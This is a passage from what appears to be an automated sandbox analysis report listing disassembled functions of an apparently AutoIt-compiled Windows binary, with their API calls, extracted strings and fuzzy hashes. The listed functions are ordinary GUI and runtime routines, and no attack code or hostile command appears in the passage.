                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window
                                      • String ID: 0
                                      • API String ID: 2353593579-4108050209
                                      • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                      • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                      • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                      • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                      Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(0000000F), ref: 0044A05E
                                      • GetClientRect.USER32(?,?), ref: 0044A0D1
                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                      • GetWindowDC.USER32(?), ref: 0044A0F6
                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                      • ReleaseDC.USER32(?,?), ref: 0044A11B
                                      • GetSysColor.USER32(0000000F), ref: 0044A131
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                      • GetSysColor.USER32(0000000F), ref: 0044A14F
                                      • GetSysColor.USER32(00000005), ref: 0044A15B
                                      • GetWindowDC.USER32(?), ref: 0044A1BE
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                      • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                      • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                      • GetSysColor.USER32(00000008), ref: 0044A265
                                      • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                      • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                      • GetStockObject.GDI32(00000005), ref: 0044A28A
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                      • String ID:
                                      • API String ID: 1744303182-0
                                      • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                      • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                      • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                      • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                      Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: >>>AUTOIT SCRIPT<<<$\
                                      • API String ID: 0-1896584978
                                      • Opcode ID: c7b3ca60bbd7daa56e48a85a1f5ff4706a5dc4aec21eac7656b22477555bf00a
                                      • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                      • Opcode Fuzzy Hash: c7b3ca60bbd7daa56e48a85a1f5ff4706a5dc4aec21eac7656b22477555bf00a
                                      • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                      Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2485277191-404129466
                                      • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                      • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                      • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                      • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                      Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(?,00000063), ref: 0045464C
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                      • SetWindowTextW.USER32(?,?), ref: 00454678
                                      • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                      • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                      • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                      • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                      • GetWindowRect.USER32(?,?), ref: 004546F5
                                      • SetWindowTextW.USER32(?,?), ref: 00454765
                                      • GetDesktopWindow.USER32 ref: 0045476F
                                      • GetWindowRect.USER32(00000000), ref: 00454776
                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                      • GetClientRect.USER32(?,?), ref: 004547D2
                                      • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                      • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                      • String ID:
                                      • API String ID: 3869813825-0
                                      • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                      • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                      • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                      • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                      Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 00464B28
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                      • _wcslen.LIBCMT ref: 00464C28
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                      • _wcslen.LIBCMT ref: 00464CBA
                                      • _wcslen.LIBCMT ref: 00464CD0
                                      • _wcslen.LIBCMT ref: 00464CEF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcslen$Directory$CurrentSystem
                                      • String ID: D
                                      • API String ID: 1914653954-2746444292
                                      • Opcode ID: b511d5d46a2f222ce4ed19d723d2e1c07e7d50b7fc8ed091f368405c23ed7f49
                                      • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                      • Opcode Fuzzy Hash: b511d5d46a2f222ce4ed19d723d2e1c07e7d50b7fc8ed091f368405c23ed7f49
                                      • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                      Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                      • API String ID: 3832890014-4202584635
                                      • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                      • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                      • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                      • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                      Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                      • GetFocus.USER32 ref: 0046A0DD
                                      • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessagePost$CtrlFocus
                                      • String ID: 0
                                      • API String ID: 1534620443-4108050209
                                      • Opcode ID: a68c403fe95e7eee9a99d276bf3bac304a732c7a84dd9b32010b3f1c6bd811a5
                                      • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                      • Opcode Fuzzy Hash: a68c403fe95e7eee9a99d276bf3bac304a732c7a84dd9b32010b3f1c6bd811a5
                                      • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                      Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?), ref: 004558E3
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$CreateDestroy
                                      • String ID: ,$tooltips_class32
                                      • API String ID: 1109047481-3856767331
                                      • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                      • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                      • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                      • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                      Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                      • __swprintf.LIBCMT ref: 00460915
                                      • __swprintf.LIBCMT ref: 0046092D
                                      • _wprintf.LIBCMT ref: 004609E1
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                      • API String ID: 3631882475-2268648507
                                      • Opcode ID: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
                                      • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                      • Opcode Fuzzy Hash: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
                                      • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                      Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                      • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                      • SendMessageW.USER32 ref: 00471740
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                      • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                      • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                      • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                      • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                      • SendMessageW.USER32 ref: 0047184F
                                      • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                      • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                      • String ID:
                                      • API String ID: 4116747274-0
                                      • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                      • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                      • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                      • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                      Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0043143E
                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                      • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                      • SelectObject.GDI32(00000000,?), ref: 00431466
                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                      • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                      • String ID: (
                                      • API String ID: 3300687185-3887548279
                                      • Opcode ID: f39f5f9ae481ec9d89b28e017500a91edb5d84f1e4edfe6a585574389a683a62
                                      • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                      • Opcode Fuzzy Hash: f39f5f9ae481ec9d89b28e017500a91edb5d84f1e4edfe6a585574389a683a62
                                      • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                      Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                      • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                      • API String ID: 1976180769-4113822522
                                      • Opcode ID: 0f6c8a3de1c9442f7f3474ab6782275dee6e5c09c811d69c53e3fb1fd536eda6
                                      • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                      • Opcode Fuzzy Hash: 0f6c8a3de1c9442f7f3474ab6782275dee6e5c09c811d69c53e3fb1fd536eda6
                                      • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                      Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
